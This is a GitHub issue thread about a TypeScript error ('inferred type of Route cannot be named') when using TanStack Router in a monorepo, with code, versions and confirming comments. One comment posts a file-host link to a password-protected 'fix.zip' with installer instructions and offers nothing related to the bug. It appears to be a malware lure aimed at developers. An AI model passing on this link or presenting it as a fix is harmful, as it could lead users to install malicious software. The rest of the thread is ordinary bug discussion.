### ISSUE TITLE
Monorepo TS Issue on Routes: The inferred type of 'Route' cannot be named without a reference to '*/@tanstack/react-router/dist/esm/route'

### ISSUE THREAD

**Issue by austinm911** [TanStack/router#2188]
### Describe the bug

Noticing this as I build on this monorepo template.

```ts
The inferred type of 'Route' cannot be named without a reference to '../../../../node_modules/@tanstack/react-router/dist/esm/route'. This is likely not portable. A type annotation is necessary.
```

```ts
// main.tsx
const router = createRouter({
	// ^ error
	routeTree,
	defaultPreload: 'intent',
	defaultStaleTime: 5000,
	context: {
		user: 'John Doe',
	},
})

// routes/index.tsx
export const Route = createFileRoute('/')({
            // ^ error
	beforeLoad: (context) => {
		console.log('beforeLoad', context)
	},
	component: Home,
})
```

### Your Example Website or App

https://github.com/austinm911/tanstack-monorepo/tree/ts-router-route-bug

### Steps to Reproduce the Bug or Issue

1. Add root context
2. add before load to root index.tsx

### Expected behavior

no ts issues

### Platform

```
  ├── @tanstack/react-router@1.50.1
  ├── @tanstack/router-devtools@1.50.1
  ├── @tanstack/router-plugin@1.49.3
  ├── @types/react-dom@18.3.0
  ├── @types/react@18.3.4
  ├── @vitejs/plugin-react@4.3.1
  ├── immer@10.1.1
  ├── react-dom@18.3.1
  ├── react@18.3.1
  ├── redaxios@0.5.1
  ├── vite@5.4.2
  └── zod@3.23.8
```

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by uncvrd** [comment]
I tried upgrading from 

`"@tanstack/react-router": "1.45.6"`

to 

`"@tanstack/react-router": "1.51.2"`

and just started experiencing this same error in my monorepo too

**Comment by skryvytskyi** [comment]
The same issue, when use some callback props in `beforeLoad`, for example `beforeLoad={({ context }) => {}}`
